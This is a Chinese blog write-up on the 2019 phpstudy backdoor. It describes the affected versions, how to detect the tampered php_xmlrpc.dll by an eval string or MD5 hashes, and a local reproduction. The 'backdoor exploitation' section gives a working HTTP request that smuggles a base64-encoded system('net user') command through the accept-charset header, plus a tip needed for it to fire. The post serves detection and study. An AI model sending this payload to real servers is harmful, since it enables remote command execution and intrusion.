phpstudy漏洞复现

前言

在玩手机的时候,发现微信推了一篇文章,案件背景如下:

2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量敏感信息。通过专业技术溯源进行分析,查明了数据回传的信息种类、原理方法、存储位置,并聘请了第三方鉴定机构对软件中的“后门”进行司法鉴定,鉴定结果是该“后门”文件具有控制计算机的功能,嫌疑人已通过该后门远程控制下载运行脚本实现收集用户个人信息。在2019年9月20日,网上爆出phpstudy存在“后门”。作者随后发布了声明。
于是想起自己安装过phpstudy软件,赶紧查一下是否存在后门文件,结果一看真存在后门,学个PHP真是不容易,软件被别人偷偷安装了后门。

phpstudy是一款PHP调试环境的程序集成包,集成了最新的Apache、PHP、phpMyAdmin、ZendOptimizer等多款软件一次性安装,无需配置,即装即用。由于其免费且方便的特性,在国内有着近百万的PHP语言学习者、开发者用户。

影响版本

phpstudy 2016版php-5.4

phpstudy 2018版php-5.2.17

phpstudy 2018版php-5.4.45

后门检测

作为学生党,我也一直在用phpstudy,所以要看看是不是自己的phpstudy也存在这个后门。

检测方法

看了一些文章之后,发现这个后门是在phpstudy 2018版php-5.2.17和phpstudy 2018版php-5.4.45的\ext\php_xmlrpc.dll,

phpstudy漏洞复现_第1张图片

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-z4QefP4k-1569574450694)(C:\Users\17295\AppData\Roaming\Typora\typora-user-images\1569572216340.png)]

打开这两个文件,ctrl+F搜索一下,看看有没有eval,文件存在@eval(%s(‘%s’))证明漏洞存在,

结果,,,

uKBWKs.png

显然,我的phpstudy存在后门,也可以利用MD5值检测是不是存在后门。

后门文件MD5值:
MD5: 0F7AD38E7A9857523DFBCE4BCE43A9E9
MD5: C339482FD2B233FB0A555B629C0EA5D5

后门的原理我不懂 。。。但是也看到了几篇文章,以后可以看看。

http://www.52bug.cn/hkjs/6100.html

https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw

后门利用

这里是大佬的后门包

GET /test/2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip,deflate
accept-charset: (这里是你要执行的命令的base64加密值)ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Connection: close
Cookie: _ga=GA1.1.994769775.1540538530; security_level=0
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

**accept-charset: **字段要写要执行命令的base64值

在本地随便写个PHP文件,把phpstudy的版本切换到5.4.45或者5.2.17,用bp抓包,

phpstudy漏洞复现_第2张图片

然后添加,

accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7

ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7是echo system(“net user”);的base64值,

phpstudy漏洞复现_第3张图片

即可得到当前用户,

在这里的时候,出现一个问题,

phpstudy漏洞复现_第4张图片

gzip和deflate之间有一个空格,有空格的时候,会导致无法利用这个后门,要把这个空格删掉才行。

phpstudy后门rce批量利用脚本

参考文章

https://www.cnblogs.com/yuzly/p/11565997.html

https://blog.csdn.net/weixin_43886632/article/details/101294081

https://www.cnblogs.com/-qing-/p/11575622.html

你可能感兴趣的:(Security)